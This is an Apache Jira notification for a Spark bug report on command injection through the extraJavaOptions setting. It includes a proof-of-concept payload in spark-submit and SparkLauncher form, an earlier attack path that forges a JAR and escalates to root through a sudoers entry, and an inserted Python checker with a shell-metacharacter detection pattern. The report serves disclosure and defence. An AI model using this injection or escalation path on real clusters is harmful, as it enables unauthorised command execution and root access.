[ https://issues.apache.org/jira/browse/SPARK-50240?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Xiaotong updated SPARK-50240:
-----------------------------
    Affects Version/s: 3.5.1
                           (was: 3.5.3)
          Description:
We found that Spark allows users to upload a jar package with `extraJavaOptions`.

When instantiating a JAR package, the javaOption configuration construct is used to execute the command if you configure the advanced optional parameter:
{color:#808080}spark.executor.extraJavaOption:{color}
{code:java}
\'touch\$IFS/tmp/zzz123|'
{code}
The instance executes the jar package, uses the Yarn mode, and injects 'touch /tmp/zzz123' into the bash -c execution command.

Command as:
{code:java}
spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar
{code}
For Java:
{code:java}
sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/zzz123`");
{code}
Spark execution location:
!image-2024-11-12-10-49-35-069.png!

  was:
We found an attack path, which can follow the customized Spark rules, upload a fake JAR package, and escalate privilege to perform command injection attacks.

*Attack Path:*
# Obtain the common CAE user permission
# Fake JAR packages and XML based on customized Spark rules
# Compress the jar package and xml, and upload it to CAE for instantiation
# Run the fake instance
# The instance calls the JAR package to perform command injection

*Attack Implementation:*
During upload, only the name of the package is verified:
{code:java}
// File localFile = new File(ValidFileName)
if(!StringUtils.endsWith(localFilePath, suffix:"com.xxx.xxx.xxx.jar") && !StringUtils.endsWith(localFilePath, suffix:"xxxxx"))
    xxxx
return xxxx
{code}
Forge JAR packages and validate XML:
{code:java}
<?xml version="1.0" encoding="utf-8"?>
<rule>
  <rule>
    <rulename>TestApp</rulename>
    <uri></uri>
    <jarname>com.xxx.xxx.xxx.jar</jarname>
    <sparkjobclassname>com.xxx.xxx.TestApp</sparkjobclassname>
    ...
...
{code}
Injection at runtime:
{code:java}
CAEcluster1:/home/sshuser # ll /tmp/target
-rw-r----- 1 streaming universe 0 Aug 6 10:32 /tmp/target
CAEcluster1:/home/sshuser #
{code}
Escalate privileges to the root user:
{code:java}
CAEcluster1:/etc/init.d # ll
... ...
-rwx------ 1 streaming universe 7044 Jul 11 12:09 rcstreaming.sh
... ...
CAEcluster1:/etc/init.d #
{code}
{code:java}
CAEcluster1:/etc/init.d # cat /etc/sudoers /etc/sudoers.d/* | grep rcstreaming.sh
streaming ALL=(root) NOPASSWD: /etc/init.d/rcstreaming.sh
CAEcluster1:/etc/init.d #
{code}
           Issue Type: Bug  (was: Improvement)
              Summary: Command Execution Vulnerability in Spark (JavaOptions)  (was: Injection issues caused by uploading a fake jar package)

> Command Execution Vulnerability in Spark (JavaOptions)
> ------------------------------------------------------
>
>                 Key: SPARK-50240
>                 URL: https://issues.apache.org/jira/browse/SPARK-50240
>             Project: Spark
>          Issue Type: Bug
>          Components: Spark Submit
>    Affects Versions: 3.5.1
>            Reporter: Xiaotong
>            Priority: Critical
>
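A defensive pre-submit check, added here as an example and not code from the report or from Spark itself: it parses the `--conf` arguments of a spark-submit line and rejects `extraJavaOptions` values that carry shell metacharacters, the construct the report above shows reaching the `bash -c` command line. The driver and YARN AM option keys, the allow-list pattern and the sample command (constructed from the report's payload shape) are assumptions.

```python
import re
import shlex

# Spark keys whose values are spliced into the JVM launch command line
# (the executor one is the channel the report above describes).
JAVA_OPTION_KEYS = (
    "spark.executor.extraJavaOptions",
    "spark.driver.extraJavaOptions",
    "spark.yarn.am.extraJavaOptions",
)
# Anything that lets a value escape from a JVM flag into shell syntax:
# backticks, $-expansion ($IFS, $(...)), pipes, separators, redirects.
SHELL_META = re.compile(r"[`$|;&<>\n]")
# Allow-list of what a genuine JVM option needs: -Xmx4g, -Dkey=value,
# -XX:+UseG1GC, file paths, commas, spaces between flags (assumed policy).
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_.,:=+/@%\-\s]*$")

# Constructed sample, not a captured command: the payload shape from the report above.
CONSTRUCTED_CMD = (
    "spark-submit --class JavaWordCount --master yarn --deploy-mode client "
    "--conf 'spark.executor.extraJavaOptions=`touch$IFS/tmp/zzz123`' test.jar"
)


def check_java_options(conf):
    """Return (key, reason) findings for unsafe extraJavaOptions values in a conf dict."""
    findings = []
    for key in JAVA_OPTION_KEYS:
        value = conf.get(key)
        if value is None:
            continue
        hit = SHELL_META.search(value)
        if hit:
            findings.append((key, f"shell metacharacter {hit.group(0)!r}"))
        elif not SAFE_VALUE.match(value):
            findings.append((key, "character outside the JVM option allow-list"))
    return findings


def parse_spark_submit(cmdline):
    """Collect --conf key=value pairs from a spark-submit line (POSIX shell quoting)."""
    conf = {}
    args = shlex.split(cmdline)
    for i, arg in enumerate(args):
        if arg == "--conf" and i + 1 < len(args) and "=" in args[i + 1]:
            key, value = args[i + 1].split("=", 1)
            conf[key] = value
    return conf
```

An empty findings list means the submission can proceed; anything else should be rejected before the launcher builds the executor command.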
--
This message was sent by Atlassian Jira (v8.20.10#820010)